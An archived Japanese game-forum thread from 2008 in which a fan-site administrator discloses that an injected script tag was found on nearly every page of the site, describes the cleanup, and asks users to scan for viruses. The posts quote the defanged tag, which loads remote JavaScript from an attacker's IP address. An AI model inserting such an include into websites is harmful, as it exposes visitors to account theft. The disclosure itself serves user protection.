詩人スレッドログ倉庫
【吟遊詩人】♪やっと来た新アビ♪【第九十五楽章】
- 793 名前: 名も無き軍師 投稿日:2008/08/07(木) 22:04:32 ID:+fSzCKWr
- ○詩人スレ住人の方へ 大切なご連絡です○
かなり久しぶりに書き込みます。>>1のテンプレサイト管理人です。
さきほど気付いたのですが、8月2日23時45分頃〜今まで、
テンプレサイト内のほぼ全ページに、
謎のスクリプトが、仕込まれてしまっていたようです。
仕込まれていたのは、下記のようなものです。
<script src= h t t p : // 1039045744 : 88 / jp.js ></script>
↑↑危険かもしれないので、一部スペースを入れ、アクセスできないように書いています。
1039045744で検索すると、どうもアカウントハックを目的とするサイトのようだったので、
慌てて削除をしておきましたが、この期間中にアクセスされた方は、
もしかするとウィルスに感染しているかもしれません。
心当たりのある方は、一度ウィルスチェック等をしていただければと思います。
こんなことが起こるとは思いもよらず、どう対処すればいいのか混乱している状況ですが、
さしあたり、まずは報告をしておくべき、と考え、書き込みさせていただきました。
以上、よろしくお願いします。
- 794 名前: 名も無き軍師 投稿日:2008/08/08(金) 00:10:38 ID:clYeVQ9K
- >>793続報です。
○被害状況
テンプレサイトは、「左側メニュー」・「ヘッダ」・「フッタ」をどのページにも共通に読み込む作りになっているのですが、
この共通部品である、「左側メニュー」・「ヘッダ」の2つのファイルにスクリプトが埋め込まれてしまったため、
ほぼ全ページにスクリプトを仕込まれた状態になっていました。
なお、2つのファイルの更新時刻は、8月2日23時45分、8月2日23時49分でした。
○対応状況
どういう経緯でファイルが書き換えられてしまったのか不明なため、
さしあたりの対処として、下記3点を行いました。
・書き換えられていた2つのファイルの差し戻し
・FTPパスワードの変更
・TOPページに警告を掲載
とりあえずこれで様子をみたいと思いますが、
これ以外に何かするべき対策などあれば、お知らせいただけるとありがたいです。
よろしくお願いします。